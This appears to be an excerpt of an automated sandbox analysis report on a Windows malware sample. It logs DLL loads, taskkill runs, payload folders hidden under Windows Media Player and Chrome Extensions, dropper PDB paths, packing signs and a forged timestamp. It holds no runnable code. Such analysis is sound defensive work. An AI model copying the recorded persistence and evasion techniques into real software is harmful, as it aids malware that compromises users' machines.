Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: amsi.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Cleaner.lnk.22.dr

LNK file: ..\AppData\Local\Temp\9D01A5Jfed0VtJf6\Y-Cleaner.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Directory created: C:\Program Files\Google\Chrome\Extensions	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Directory created: C:\Program Files\Windows Media Player\graph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Directory created: C:\Program Files\Windows Media Player\graph\graph.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip	Jump to behavior

Source: file.exe

Static file information: File size 3189248 > 1048576

Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: file.exe

Static PE information: Raw size of sfctgzqb is bigger than: 0x100000 < 0x29ee00

Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2412707099.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2413257416.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb% source: dwVrTdy.exe, 00000009.00000003.2123748966.000001B9CFD20000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 0000000C.00000000.2123985997.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000000C.00000002.2145233221.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000000E.00000000.2144190009.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000000F.00000000.2184398416.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 00000015.00000000.2210905809.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000001C.00000000.2376475392.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2403438920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdb source: F0A3.tmp.ctx.exe, 00000027.00000002.2494789208.00007FF821D65000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2407734052.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb[ source: dwVrTdy.exe, 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 00000009.00000000.2012245571.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000000.2029600049.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000002.2184962694.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, AzVRM7c.exe, 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, AzVRM7c.exe, 0000000B.00000000.2075857179.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, t5abhIx.exe, 0000000D.00000002.2204343711.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp, t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402997907.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2411298731.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2412401802.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2413433543.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: F0A3.tmp.ctx.exe, 00000027.00000002.2498270085.00007FF838AC1000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2404034326.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2411720921.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2410685858.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2412236687.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2403127092.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: vcruntime140.amd64.pdbGCTL source: F0A3.tmp.ctx.exe, 0000001F.00000003.2401331620.00000234A0E30000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000002.2500759273.00007FF838AFE000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2408261086.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402461321.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2403281941.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2412064565.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\select.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2408717409.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdbUGP source: F0A3.tmp.ctx.exe, 00000027.00000002.2494789208.00007FF821D65000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: vcruntime140.amd64.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2401331620.00000234A0E30000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000002.2500759273.00007FF838AFE000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2413918050.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2403748215.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2411113036.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2408039545.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402824142.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2411883189.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\python38.pdb source: F0A3.tmp.ctx.exe, 00000027.00000002.2482728285.00007FF8209FD000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2407574010.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2412918529.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2408438351.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2407874978.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2414099515.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2408870662.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2411536090.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2409067450.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2403603084.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2413097007.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb source: dwVrTdy.exe, 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 00000009.00000000.2012245571.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000000.2029600049.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000002.2184962694.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, AzVRM7c.exe, 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, AzVRM7c.exe, 0000000B.00000000.2075857179.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, t5abhIx.exe, 0000000D.00000002.2204343711.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp, t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2407216629.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2406846700.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E3A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb source: dwVrTdy.exe, 00000009.00000003.2123748966.000001B9CFD20000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 0000000C.00000000.2123985997.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000000C.00000002.2145233221.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000000E.00000000.2144190009.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000000F.00000000.2184398416.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 00000015.00000000.2210905809.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000001C.00000000.2376475392.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2412551872.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2413689058.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.240000.0.unpack :EW;.rsrc:W;.idata :W;sfctgzqb:EW;qkipfcli:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;sfctgzqb:EW;qkipfcli:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 2.2.skotes.exe.fb0000.0.unpack :EW;.rsrc:W;.idata :W;sfctgzqb:EW;qkipfcli:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;sfctgzqb:EW;qkipfcli:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 3.2.skotes.exe.fb0000.0.unpack :EW;.rsrc:W;.idata :W;sfctgzqb:EW;qkipfcli:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;sfctgzqb:EW;qkipfcli:EW;.taggant:EW;

Source: FBFF.tmp.fcxcx.exe.20.dr

Static PE information: 0xD22848DC [Tue Sep 23 12:17:32 2081 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: d8d3046b98.exe.7.dr	Static PE information: real checksum: 0x1c8d79 should be: 0x1c789b
Source: random[1].exe1.7.dr	Static PE information: real checksum: 0x2b3972 should be: 0x2afd66
Source: AzVRM7c[1].exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x9f7ff
